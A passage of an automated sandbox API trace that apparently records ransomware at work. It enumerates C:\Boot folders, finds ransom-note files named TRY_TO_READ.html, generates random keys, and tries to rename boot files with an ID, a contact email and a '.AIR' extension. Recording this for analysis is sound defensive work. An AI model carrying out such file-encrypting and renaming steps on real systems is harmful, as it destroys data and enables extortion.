	[0052.024] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5670 | out: hHeap=0x540000) returned 1
	[0052.024] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.024] FindNextFileW (in: hFindFile=0x575520, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0052.024] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.024] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.024] GetLastError () returned 0x6
	[0052.024] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5670
	[0052.024] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.024] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.024] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.024] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.024] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5670 | out: hHeap=0x540000) returned 1
	[0052.024] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.024] FindNextFileW (in: hFindFile=0x575520, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9cb05f0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9cb05f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cb05f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0052.024] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.024] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.024] GetLastError () returned 0x6
	[0052.024] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.025] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583b10
	[0052.025] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.025] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.025] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583b10 | out: hHeap=0x540000) returned 1
	[0052.025] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.025] FindNextFileW (in: hFindFile=0x575520, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9cb05f0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9cb05f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cb05f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0052.025] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.025] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b74e8
	[0052.025] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5966d0
	[0052.025] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b74e8 | out: pbBuffer=0x5b74e8) returned 1
	[0052.025] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5966d0 | out: pbBuffer=0x5966d0) returned 1
	[0052.025] SetFileAttributesW (lpFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0
	[0052.025] lstrlenW (lpString="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui") returned 30
	[0052.025] GetProcessHeap () returned 0x540000
	[0052.025] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa2) returned 0x5919d0
	[0052.025] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui") returned="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui"
	[0052.025] lstrcatW (in: lpString1="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR"
	[0052.025] MoveFileExW (lpExistingFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0052.025] CreateFileW (lpFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0052.025] GetProcessHeap () returned 0x540000
	[0052.025] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.025] CloseHandle (hObject=0xffffffff) returned 0
	[0052.025] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.025] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.025] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.025] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.026] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a56c0 | out: hHeap=0x540000) returned 1
	[0052.026] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a56e8 | out: hHeap=0x540000) returned 1
	[0052.026] FindFirstFileW (in: lpFileName="C:\\\\Boot\\pt-BR\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9cb05f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cb05f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x575560
	[0052.026] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.026] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.026] GetLastError () returned 0x6
	[0052.026] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.026] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.026] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.026] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a56c0
	[0052.026] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5755a0
	[0052.026] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5755a0 | out: hHeap=0x540000) returned 1
	[0052.026] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.026] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.026] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a56c0 | out: hHeap=0x540000) returned 1
	[0052.026] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.026] FindNextFileW (in: hFindFile=0x575560, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9cb05f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cb05f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0052.026] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.026] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.026] GetLastError () returned 0x6
	[0052.026] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.026] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.026] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.026] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a56c0
	[0052.026] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5755a0
	[0052.026] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5755a0 | out: hHeap=0x540000) returned 1
	[0052.026] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.026] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.026] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a56c0 | out: hHeap=0x540000) returned 1
	[0052.027] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.027] FindNextFileW (in: hFindFile=0x575560, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0052.027] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.027] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.027] GetLastError () returned 0x6
	[0052.027] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a56c0
	[0052.027] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.027] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.027] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.027] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.027] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a56c0 | out: hHeap=0x540000) returned 1
	[0052.027] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.027] FindNextFileW (in: hFindFile=0x575560, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9cb05f0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9cb05f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cb05f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0052.027] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.027] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.027] GetLastError () returned 0x6
	[0052.027] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.027] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583b10
	[0052.027] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.027] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.027] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583b10 | out: hHeap=0x540000) returned 1
	[0052.027] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.027] FindNextFileW (in: hFindFile=0x575560, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9cb05f0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9cb05f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cb05f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0052.027] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.027] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b75f0
	[0052.027] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5966e0
	[0052.027] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b75f0 | out: pbBuffer=0x5b75f0) returned 1
	[0052.027] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5966e0 | out: pbBuffer=0x5966e0) returned 1
	[0052.027] SetFileAttributesW (lpFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0
	[0052.027] lstrlenW (lpString="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui") returned 30
	[0052.027] GetProcessHeap () returned 0x540000
	[0052.027] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa2) returned 0x5919d0
	[0052.028] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui") returned="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui"
	[0052.028] lstrcatW (in: lpString1="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR"
	[0052.028] MoveFileExW (lpExistingFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0052.028] CreateFileW (lpFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0052.028] GetProcessHeap () returned 0x540000
	[0052.028] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.028] CloseHandle (hObject=0xffffffff) returned 0
	[0052.028] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.028] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.028] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.028] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.028] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5710 | out: hHeap=0x540000) returned 1
	[0052.028] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5738 | out: hHeap=0x540000) returned 1
	[0052.028] FindFirstFileW (in: lpFileName="C:\\\\Boot\\pt-PT\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9cd6750, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cd6750, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5755a0
	[0052.028] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.028] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.028] GetLastError () returned 0x6
	[0052.028] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.028] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.028] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.028] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5710
	[0052.029] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5755e0
	[0052.029] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5755e0 | out: hHeap=0x540000) returned 1
	[0052.029] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.029] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.029] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5710 | out: hHeap=0x540000) returned 1
	[0052.029] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.029] FindNextFileW (in: hFindFile=0x5755a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9cd6750, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cd6750, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0052.029] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.029] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.029] GetLastError () returned 0x6
	[0052.029] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.029] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.029] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.029] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5710
	[0052.029] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5755e0
	[0052.029] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5755e0 | out: hHeap=0x540000) returned 1
	[0052.029] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.029] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.029] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5710 | out: hHeap=0x540000) returned 1
	[0052.029] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.029] FindNextFileW (in: hFindFile=0x5755a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0052.029] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.029] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.029] GetLastError () returned 0x6
	[0052.029] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5710
	[0052.029] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.029] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.029] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.029] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.029] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5710 | out: hHeap=0x540000) returned 1
	[0052.029] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.029] FindNextFileW (in: hFindFile=0x5755a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9cd6750, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9cd6750, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cd6750, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0052.030] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.030] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.030] GetLastError () returned 0x6
	[0052.030] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.030] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583b10
	[0052.030] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.030] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.030] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583b10 | out: hHeap=0x540000) returned 1
	[0052.030] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.030] FindNextFileW (in: hFindFile=0x5755a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9cd6750, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9cd6750, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cd6750, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0052.030] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.030] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b76f8
	[0052.030] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5966f0
	[0052.030] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b76f8 | out: pbBuffer=0x5b76f8) returned 1
	[0052.030] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5966f0 | out: pbBuffer=0x5966f0) returned 1
	[0052.030] SetFileAttributesW (lpFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0
	[0052.030] lstrlenW (lpString="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui") returned 30
	[0052.030] GetProcessHeap () returned 0x540000
	[0052.030] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa2) returned 0x5919d0
	[0052.030] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui") returned="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui"
